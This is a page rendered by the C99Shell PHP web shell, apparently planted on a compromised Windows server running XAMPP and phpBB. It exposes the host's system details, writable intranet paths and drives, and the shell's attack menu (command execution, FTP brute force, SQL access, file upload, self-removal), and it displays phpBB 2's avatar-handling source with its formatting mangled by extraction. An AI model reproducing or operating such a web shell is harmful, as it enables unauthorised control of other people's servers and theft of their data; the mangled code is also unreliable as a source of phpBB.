!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\phpbb\includes\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     usercp_avatar.php (11.56 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/***************************************************************************
 *                             usercp_avatar.php
 *                            -------------------
 *   begin                : Saturday, Feb 13, 2001
 *   copyright            : (C) 2001 The phpBB Group
 *   email                : support@phpbb.com
 *
 *   $Id: usercp_avatar.php,v 1.8.2.19 2005/02/21 18:37:51 acydburn Exp $
 *
 *
 ***************************************************************************/

/***************************************************************************
 *
 *   This program is free software; you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation; either version 2 of the License, or
 *   (at your option) any later version.
 *
 *
 ***************************************************************************/

function check_image_type(&$type, &$error, &$error_msg)
{
    global 
$lang;

    switch( 
$type )
    {
        case 
'jpeg':
        case 
'pjpeg':
        case 
'jpg':
            return 
'.jpg';
            break;
        case 
'gif':
            return 
'.gif';
            break;
        case 
'png':
            return 
'.png';
            break;
        default:
            
$error true;
            
$error_msg = (!empty($error_msg)) ? $error_msg '<br />' $lang['Avatar_filetype'] : $lang['Avatar_filetype'];
            break;
    }

    return 
false;
}

function 
user_avatar_delete($avatar_type$avatar_file)
{
    global 
$board_config$userdata;

    
$avatar_file basename($avatar_file);
    if ( 
$avatar_type == USER_AVATAR_UPLOAD && $avatar_file != '' )
    {
        if ( @
file_exists(@phpbb_realpath('./' $board_config['avatar_path'] . '/' $avatar_file)) )
        {
            @
unlink('./' $board_config['avatar_path'] . '/' $avatar_file);
        }
    }

    return 
", user_avatar = '', user_avatar_type = " USER_AVATAR_NONE;
}

function 
user_avatar_gallery($mode, &$error, &$error_msg$avatar_filename)
{
    global 
$board_config;

    
$avatar_filename str_replace(array('../''..\\''./''.\\'), ''$avatar_filename);
    if (
$avatar_filename{0} == '/' || $avatar_filename{0} == "\\")
    {
        return 
'';
    }

    if ( 
file_exists(@phpbb_realpath($board_config['avatar_gallery_path'] . '/' $avatar_filename)) && ($mode == 'editprofile') )
    {
        
$return ", user_avatar = '" str_replace("\'""''"$avatar_filename) . "', user_avatar_type = " USER_AVATAR_GALLERY;
    }
    else
    {
        
$return '';
    }
    return 
$return;
}

function 
user_avatar_url($mode, &$error, &$error_msg$avatar_filename)
{
    if ( !
preg_match('#^(http)|(ftp):\/\/#i'$avatar_filename) )
    {
        
$avatar_filename 'http://' $avatar_filename;
    }

    if ( !
preg_match("#^((ht|f)tp://)([^ \?&=\#\"\n\r\t<]*?(\.(jpg|jpeg|gif|png))$)#is"$avatar_filename) )
    {
        
$error true;
        
$error_msg = ( !empty($error_msg) ) ? $error_msg '<br />' $lang['Wrong_remote_avatar_format'] : $lang['Wrong_remote_avatar_format'];
        return;
    }

    return ( 
$mode == 'editprofile' ) ? ", user_avatar = '" str_replace("\'""''"$avatar_filename) . "', user_avatar_type = " USER_AVATAR_REMOTE '';

}

function 
user_avatar_upload($mode$avatar_mode, &$current_avatar, &$current_type, &$error, &$error_msg$avatar_filename$avatar_realname$avatar_filesize$avatar_filetype)
{
    global 
$board_config$db$lang;

    
$ini_val = ( @phpversion() >= '4.0.0' ) ? 'ini_get' 'get_cfg_var';

    if ( 
$avatar_mode == 'remote' && preg_match('/^(http:\/\/)?([\w\-\.]+)\:?([0-9]*)\/(.*)$/'$avatar_filename$url_ary) )
    {
        if ( empty(
$url_ary[4]) )
        {
            
$error true;
            
$error_msg = ( !empty($error_msg) ) ? $error_msg '<br />' $lang['Incomplete_URL'] : $lang['Incomplete_URL'];
            return;
        }

        
$base_get '/' $url_ary[4];
        
$port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80;

        if ( !(
$fsock = @fsockopen($url_ary[2], $port$errno$errstr)) )
        {
            
$error true;
            
$error_msg = ( !empty($error_msg) ) ? $error_msg '<br />' $lang['No_connection_URL'] : $lang['No_connection_URL'];
            return;
        }

        @
fputs($fsock"GET $base_get HTTP/1.1\r\n");
        @
fputs($fsock"HOST: " $url_ary[2] . "\r\n");
        @
fputs($fsock"Connection: close\r\n\r\n");

        unset(
$avatar_data);
        while( !@
feof($fsock) )
        {
            
$avatar_data .= @fread($fsock$board_config['avatar_filesize']);
        }
        @
fclose($fsock);

        if (!
preg_match('#Content-Length\: ([0-9]+)[^ /][\s]+#i'$avatar_data$file_data1) || !preg_match('#Content-Type\: image/[x\-]*([a-z]+)[\s]+#i'$avatar_data$file_data2))
        {
            
$error true;
            
$error_msg = ( !empty($error_msg) ) ? $error_msg '<br />' $lang['File_no_data'] : $lang['File_no_data'];
            return;
        }

        
$avatar_filesize $file_data1[1]; 
        
$avatar_filetype $file_data2[1]; 

        if ( !
$error && $avatar_filesize && $avatar_filesize $board_config['avatar_filesize'] )
        {
            
$avatar_data substr($avatar_datastrlen($avatar_data) - $avatar_filesize$avatar_filesize);

            
$tmp_path = ( !@$ini_val('safe_mode') ) ? '/tmp' './' $board_config['avatar_path'] . '/tmp';
            
$tmp_filename tempnam($tmp_pathuniqid(rand()) . '-');

            
$fptr = @fopen($tmp_filename'wb');
            
$bytes_written = @fwrite($fptr$avatar_data$avatar_filesize);
            @
fclose($fptr);

            if ( 
$bytes_written != $avatar_filesize )
            {
                @
unlink($tmp_filename);
                
message_die(GENERAL_ERROR'Could not write avatar file to local storage. Please contact the board administrator with this message'''__LINE____FILE__);
            }

            list(
$width$height) = @getimagesize($tmp_filename);
        }
        else
        {
            
$l_avatar_size sprintf($lang['Avatar_filesize'], round($board_config['avatar_filesize'] / 1024));

            
$error true;
            
$error_msg = ( !empty($error_msg) ) ? $error_msg '<br />' $l_avatar_size $l_avatar_size;
        }
    }
    else if ( ( 
file_exists(@phpbb_realpath($avatar_filename)) ) && preg_match('/\.(jpg|jpeg|gif|png)$/i'$avatar_realname) )
    {
        if ( 
$avatar_filesize <= $board_config['avatar_filesize'] && $avatar_filesize )
        {
            
preg_match('#image\/[x\-]*([a-z]+)#'$avatar_filetype$avatar_filetype);
            
$avatar_filetype $avatar_filetype[1];
        }
        else
        {
            
$l_avatar_size sprintf($lang['Avatar_filesize'], round($board_config['avatar_filesize'] / 1024));

            
$error true;
            
$error_msg = ( !empty($error_msg) ) ? $error_msg '<br />' $l_avatar_size $l_avatar_size;
            return;
        }

        list(
$width$height) = @getimagesize($avatar_filename);
    }

    if ( !(
$imgtype check_image_type($avatar_filetype$error$error_msg)) )
    {
        return;
    }

    if ( 
$width <= $board_config['avatar_max_width'] && $height <= $board_config['avatar_max_height'] )
    {
        
$new_filename uniqid(rand()) . $imgtype;

        if ( 
$mode == 'editprofile' && $current_type == USER_AVATAR_UPLOAD && $current_avatar != '' )
        {
            if ( 
file_exists(@phpbb_realpath('./' $board_config['avatar_path'] . '/' $current_avatar)) )
            {
                @
unlink('./' $board_config['avatar_path'] . '/' $current_avatar);
            }
        }

        if( 
$avatar_mode == 'remote' )
        {
            @
copy($tmp_filename'./' $board_config['avatar_path'] . "/$new_filename");
            @
unlink($tmp_filename);
        }
        else
        {
            if ( @
$ini_val('open_basedir') != '' )
            {
                if ( @
phpversion() < '4.0.3' )
                {
                    
message_die(GENERAL_ERROR'open_basedir is set and your PHP version does not allow move_uploaded_file'''__LINE____FILE__);
                }

                
$move_file 'move_uploaded_file';
            }
            else
            {
                
$move_file 'copy';
            }

            if (!
is_uploaded_file($avatar_filename))
            {
                
message_die(GENERAL_ERROR'Unable to upload file'''__LINE____FILE__);
            }
            
$move_file($avatar_filename'./' $board_config['avatar_path'] . "/$new_filename");
        }

        @
chmod('./' $board_config['avatar_path'] . "/$new_filename"0777);

        
$avatar_sql = ( $mode == 'editprofile' ) ? ", user_avatar = '$new_filename', user_avatar_type = " USER_AVATAR_UPLOAD "'$new_filename', " USER_AVATAR_UPLOAD;
    }
    else
    {
        
$l_avatar_size sprintf($lang['Avatar_imagesize'], $board_config['avatar_max_width'], $board_config['avatar_max_height']);

        
$error true;
        
$error_msg = ( !empty($error_msg) ) ? $error_msg '<br />' $l_avatar_size $l_avatar_size;
    }

    return 
$avatar_sql;
}

function 
display_avatar_gallery($mode, &$category, &$user_id, &$email, &$current_email, &$coppa, &$username, &$email, &$new_password, &$cur_password, &$password_confirm, &$icq, &$aim, &$msn, &$yim, &$website, &$location, &$occupation, &$interests, &$signature, &$viewemail, &$notifypm, &$popup_pm, &$notifyreply, &$attachsig, &$allowhtml, &$allowbbcode, &$allowsmilies, &$hideonline, &$style, &$language, &$timezone, &$dateformat, &$session_id)
{
    global 
$board_config$db$template$lang$images$theme;
    global 
$phpbb_root_path$phpEx;

    
$dir = @opendir($board_config['avatar_gallery_path']);

    
$avatar_images = array();
    while( 
$file = @readdir($dir) )
    {
        if( 
$file != '.' && $file != '..' && !is_file($board_config['avatar_gallery_path'] . '/' $file) && !is_link($board_config['avatar_gallery_path'] . '/' $file) )
        {
            
$sub_dir = @opendir($board_config['avatar_gallery_path'] . '/' $file);

            
$avatar_row_count 0;
            
$avatar_col_count 0;
            while( 
$sub_file = @readdir($sub_dir) )
            {
                if( 
preg_match('/(\.gif$|\.png$|\.jpg|\.jpeg)$/is'$sub_file) )
                {
                    
$avatar_images[$file][$avatar_row_count][$avatar_col_count] = $file '/' $sub_file
                    
$avatar_name[$file][$avatar_row_count][$avatar_col_count] = ucfirst(str_replace("_"" "preg_replace('/^(.*)\..*$/''\1'$sub_file)));

                    
$avatar_col_count++;
                    if( 
$avatar_col_count == )
                    {
                        
$avatar_row_count++;
                        
$avatar_col_count 0;
                    }
                }
            }
        }
    }

    @
closedir($dir);

    @
ksort($avatar_images);
    @
reset($avatar_images);

    if( empty(
$category) )
    {
        list(
$category, ) = each($avatar_images);
    }
    @
reset($avatar_images);

    
$s_categories '<select name="avatarcategory">';
    while( list(
$key) = each($avatar_images) )
    {
        
$selected = ( $key == $category ) ? ' selected="selected"' '';
        if( 
count($avatar_images[$key]) )
        {
            
$s_categories .= '<option value="' $key '"' $selected '>' ucfirst($key) . '</option>';
        }
    }
    
$s_categories .= '</select>';

    
$s_colspan 0;
    for(
$i 0$i count($avatar_images[$category]); $i++)
    {
        
$template->assign_block_vars("avatar_row", array());

        
$s_colspan max($s_colspancount($avatar_images[$category][$i]));

        for(
$j 0$j count($avatar_images[$category][$i]); $j++)
        {
            
$template->assign_block_vars('avatar_row.avatar_column', array(
                
"AVATAR_IMAGE" => $board_config['avatar_gallery_path'] . '/' $avatar_images[$category][$i][$j], 
                
"AVATAR_NAME" => $avatar_name[$category][$i][$j])
            );

            
$template->assign_block_vars('avatar_row.avatar_option_column', array(
                
"S_OPTIONS_AVATAR" => $avatar_images[$category][$i][$j])
            );
        }
    }

    
$params = array('coppa''user_id''username''email''current_email''cur_password''new_password''password_confirm''icq''aim''msn''yim''website''location''occupation''interests''signature''viewemail''notifypm''popup_pm''notifyreply''attachsig''allowhtml''allowbbcode''allowsmilies''hideonline''style''language''timezone''dateformat');

    
$s_hidden_vars '<input type="hidden" name="sid" value="' $session_id '" /><input type="hidden" name="agreed" value="true" />';

    for(
$i 0$i count($params); $i++)
    {
        
$s_hidden_vars .= '<input type="hidden" name="' $params[$i] . '" value="' str_replace('"''&quot;', $$params[$i]) . '" />';
    }
    
    
$template->assign_vars(array(
        
'L_AVATAR_GALLERY' => $lang['Avatar_gallery'], 
        
'L_SELECT_AVATAR' => $lang['Select_avatar'], 
        
'L_RETURN_PROFILE' => $lang['Return_profile'], 
        
'L_CATEGORY' => $lang['Select_category'], 

        
'S_CATEGORY_SELECT' => $s_categories
        
'S_COLSPAN' => $s_colspan
        
'S_PROFILE_ACTION' => append_sid("profile.$phpEx?mode=$mode"), 
        
'S_HIDDEN_FIELDS' => $s_hidden_vars)
    );

    return;
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--